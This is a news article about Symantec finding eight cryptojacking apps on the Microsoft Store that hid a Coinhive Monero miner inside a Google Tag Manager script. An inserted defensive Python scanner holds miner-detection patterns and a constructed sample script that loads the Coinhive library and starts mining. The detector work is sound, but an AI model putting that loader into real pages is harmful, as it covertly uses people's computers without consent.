Microsoft Pulls Down 8 Malicious Crypto-Mining Apps from Microsoft Store

Feb 17 2019

As the popularity of cryptocurrencies rises, so do cryptocurrency-related crimes. One of the most common is cryptojacking, where a device mines cryptocurrency without the knowledge or permission of its owner. Eight such applications, which were mining cryptocurrency with the processing power of users' computers, were recently pulled from the Microsoft Store.

These applications were first spotted by the security firm Symantec. In a blog post published after the apps were removed, the company explained what they were doing. Symantec found the applications on the Microsoft Store on the 17th of January. The company points out that all of these Microsoft Store applications were making use of the Coinhive script, which is among the most popular means of mining cryptocurrency illicitly.

All of these applications ran on the Windows 10 and Windows 10 S platforms. Windows 10 S users rely heavily on the Microsoft Store for applications, because that edition does not allow installing apps from any other source. Symantec also notes in its report that all of these applications were published by three developers: DigiDreams, 1Clean and Findoo.

The applications are Fast-search Lite, Battery Optimizer (tutorials), VPN Browser+, Downloader for YouTube Videos, Clean Master+ (tutorials), FasTube, Findoo Browser 2019, and Findoo Mobile and Desktop Search. They deal with searching and browsing, battery optimization and improving the web experience.

How Do These Applications Work?

Symantec points out that the modus operandi of all these apps is very similar, which makes it reasonable to assume that they were developed by the same person or group of people. The Symantec report notes:

“In total, we discovered eight apps from these developers that shared the same risky behaviour. After further investigation, we believe that all these apps were likely developed by the same person or group.”

The company also explained how the apps function. Once a user downloads and opens any of them, the app fetches a Google Tag Manager JavaScript library from the developers' own domain servers. That library is where the Coinhive script is hidden; it uses the CPU of the user's computer to mine the Monero (XMR) cryptocurrency.

Apart from informing Microsoft, Symantec also notified Google that the malicious Coinhive JavaScript was being served through Google Tag Manager, and Google has since removed it. Symantec notes that although each of these applications had a privacy policy, none of the policies mentioned that the app would mine cryptocurrency.
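As an added example (not from the article or from Symantec's report), the following Python script models the two-stage loading described above from a defender's side: it lists the Tag Manager containers an app page references and flags any fetched container body that carries the public Coinhive library's loader, constructor or start() call. The container IDs, site key and script bodies are constructed placeholders.

```python
import re

# Indicator patterns for the public Coinhive browser-miner library: its
# script path, its constructor and its start() call with a tab-mode constant.
MINER_PATTERNS = [
    (re.compile(r"coinhive\.com/lib/coinhive\.min\.js"), "loads coinhive.min.js"),
    (re.compile(r"CoinHive\.Anonymous\s*\("), "instantiates CoinHive.Anonymous"),
    (re.compile(r"\.start\s*\(\s*CoinHive\."), "starts the miner with a CoinHive tab mode"),
]
GTM_HOST = "googletagmanager.com"
GTM_ID = re.compile(r"GTM-[A-Z0-9]{4,9}")

def gtm_containers(app_markup):
    """Return the Tag Manager container IDs that an app page loads remotely."""
    if GTM_HOST not in app_markup:
        return []
    return sorted(set(GTM_ID.findall(app_markup)))

def scan_script(js_text):
    """Return the labels of miner indicators present in fetched JavaScript."""
    return [label for pat, label in MINER_PATTERNS if pat.search(js_text)]

def triage(app_markup, fetched):
    """Map each container the page loads to the miner indicators in its body.
    Scripts in `fetched` that the page never references are ignored."""
    return {cid: scan_script(fetched.get(cid, "")) for cid in gtm_containers(app_markup)}

# Constructed sample input: a WebView page that loads two containers.
APP_PAGE = """<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPL1"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPL2"></script>"""
FETCHED = {
    # constructed: a custom HTML tag body that drops the Coinhive loader
    "GTM-EXAMPL1": ("var s=document.createElement('script');"
                    "s.src='https://coinhive.com/lib/coinhive.min.js';"
                    "document.head.appendChild(s);s.onload=function(){"
                    "var m=new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER',{throttle:0.2});"
                    "m.start(CoinHive.FORCE_EXCLUSIVE_TAB);};"),
    # constructed: a benign container that only pushes analytics events
    "GTM-EXAMPL2": "window.dataLayer=window.dataLayer||[];dataLayer.push({event:'pageview'});",
}

if __name__ == "__main__":
    for cid, hits in triage(APP_PAGE, FETCHED).items():
        print(cid, "MINER INDICATORS" if hits else "clean", hits)
```

In practice the fetched bodies would come from a proxy or sandbox capture of what the app actually downloads, since a container can change after an app passes Store review.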

Monero is among the cryptocurrencies most favoured by criminals for this kind of crypto-crime. Reports indicate that approximately 4.3% of all Monero in circulation has been mined by illicit means such as these. The company states in its report:

“Overall, we estimate there are at least 2,218 active campaigns that have accumulated about 720,000 XMR ($57 million).”

Stay tuned with us at Cryptoground for more news stories and updates from the world of cryptocurrencies and the blockchain technology! 